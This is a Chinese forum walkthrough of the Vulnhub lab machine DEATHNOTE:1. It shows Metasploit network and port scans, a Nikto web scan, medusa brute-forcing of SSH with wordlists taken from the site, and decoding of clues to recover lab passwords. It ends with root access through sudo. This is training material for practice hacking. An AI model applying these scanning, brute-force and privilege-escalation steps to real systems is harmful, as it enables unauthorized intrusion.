Vulnhub 靶机篇:DEATHNOTE:1
## 0x01 靶机信息
> - **名称**:DEATHNOTE:1
> - **发布日期**:2021 年 9 月 4 日
> - **作者**:HWKDS
> - **系列**:Deathnote
> - **难度**:简易
> - **简介**:不要浪费太多时间跳出框框思考。 这是一个直接的盒子。
> - **下载链接**:[https://download.vulnhub.com/deathnote/Deathnote.ova](https://download.vulnhub.com/deathnote/Deathnote.ova)
> - **MD5**:D5F6A19BBEA617D7C7C46E21C518F698
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 主机探测
使用msf的scanner/discovery/arp_sweep 模块进行arp扫描
``` text
set rhosts 192.168.181.0/24
设置目标网段
```
arp扫描到目标机192.168.181.147
!(data/attachment/forum/202405/27/104226srwnrne2nmqlroo2.png)
### 2.2 使用msf扫描端口
``` text
使用auxiliary/scanner/portscan/tcp模块
set rhosts 192.168.181.147
设置目标地址
set ports 1-65535
设置端口范围
set threads 50
设置线程数50
```
!(data/attachment/forum/202405/27/104238v5qsmmehmoewx0xt.png)
扫描出目标机开放了22和80端口
!(data/attachment/forum/202405/27/104249oauuwiauuf4zrfrt.png)
访问网站跳转到了这个域名
!(data/attachment/forum/202405/27/104258pbb667gqm3jgtkb5.png)
加入hosts文件继续访问
!(data/attachment/forum/202405/27/104305ap8ricpuq84wwpqe.png)
访问主页,可以发现KIRA和L对应着两个人,KIRA很可能是站点用户
!(data/attachment/forum/202405/27/104314xs6dfdelddzdedjr.png)
!(data/attachment/forum/202405/27/104325ydb73dkb2y5inack.png)
``` text
my fav line is iamjustic3
翻译:我最喜欢的线路是 iamjustic3
(这个推测跟KIRA用户有关,可能是密码)
L on i will eliminate you L!
(意思是L在i will eliminate you L!中)
```
点击链接查看关于L的线索
!(data/attachment/forum/202405/27/104335yalf3ag3nwjkayzk.png)
``` text
I am light yagami , son of Soichiro Yagami . A great and intelligent person exists on this planet after L . ….
翻译:我是夜神光,八神总一郎的儿子。在L之后,这个星球上存在着一位伟大而聪明的人。
说明KIRA是在L之后创建的用户,代表L可能权限更大
```
查看HINT页面,发现了一段提示
!(data/attachment/forum/202405/27/104344mwkeceechhc99h92.png)
``` text
Find a notes.txt file on server or SEE the L comment
翻译:在服务器上查找notes.txt文件或查看L注释
```
### 2.3 使用nikto扫描网站
扫描发现上传目录uploads和登录界面wp-login.php
!(data/attachment/forum/202405/27/104409eh5kfojjvo1vxhzt.png)
找到了notes文件和一个user文件
!(data/attachment/forum/202405/27/104418spaj6gsgvbab22ak.png)
user.txt对应着用户
!(data/attachment/forum/202405/27/104430dhfjzppz2ekehelb.png)
notes.txt 就是密码文件
!(data/attachment/forum/202405/27/104439wy3y3yfp2ud0ups2.png)
### 2.4 medusa 爆破ssh
将文件保存,并用medusa爆破
``` text
medusa -h 192.168.181.147 -U test/user.txt -P test/notes.txt -M ssh -f -t 50
-U 指定用户字典,-P 指定密码字典,-M 模式ssh,-f 第一个爆破成功后停止,-t 线程数量
```
爆破出用户l,密码death4me
!(data/attachment/forum/202405/27/104449gfcb7wscn4cfcrqb.png)
登陆后发现user.txt文件,内容使用了brainfuck加密
!(data/attachment/forum/202405/27/104458b0gggydpyab33gk0.png)
!(data/attachment/forum/202405/27/104506cbs6db7j8l583sb4.png)
``` text
i think u got the shell , but you wont be able to kill me -kira
翻译:我想你拿到了外壳,但你杀不了我-kira
```
这个文件没有用处,继续枚举
发现用户kira,尝试利用主页发现的字符iamjustic3登录失败
!(data/attachment/forum/202405/27/104515qza9388pad357a5e.png)
查看case-file.txt文件
!(data/attachment/forum/202405/27/104523t6yef5oyeuqxw62q.png)
``` text
the FBI agent died on December 27, 2006
1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .
hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .
and we also found something in
fake-notebook-rule folder .
翻译:
FBI特工于2006年12月27日去世
工作组成员/负责人调查后 1 周。
又名......
八神宗一郎的家人。
嗯嗯嗯嗯……
据渡说,
在基拉瞄准他们后,他和其他人一样死了
我们还发现了一些东西
假笔记本规则文件夹。
```
查看fake-notebook-rule 文件
提示我们用cyberchef解密
!(data/attachment/forum/202405/27/104533ccczjt5m5whcmzc3.png)
一共两层,一层16进制,一层base64加密
!(data/attachment/forum/202405/27/104540m46688l4pap11at1.png)
!(data/attachment/forum/202405/27/104548qi9zqk19qgl2k6xx.png)
解出密码:kiraisevil
尝试登陆kira,发现拥有所有sudo权限
!(data/attachment/forum/202405/27/104601djj0z20shgcbg0d0.png)
### 2.5 提权
``` text
sudo /bin/bash
```
!(data/attachment/forum/202405/27/104612x444g4egw11nc4m6.png)
查看之前没权限的kira.txt
!(data/attachment/forum/202405/27/104622t5tjzy56hithprzn.png)
base64解码
!(data/attachment/forum/202405/27/104631e5z15ainajacjl55.png)
``` text
please protect one of the following
翻译:请保护以下其中一项
1. L (/opt)
2. Misa (/var)
```
查看Misa,发现对于我们没用
!(data/attachment/forum/202405/27/104640tffq3twgt3tgs0tm.png)
拿到flag
!(data/attachment/forum/202405/27/104648xzp2fz5bg6oqab2f.png)
页:
[1]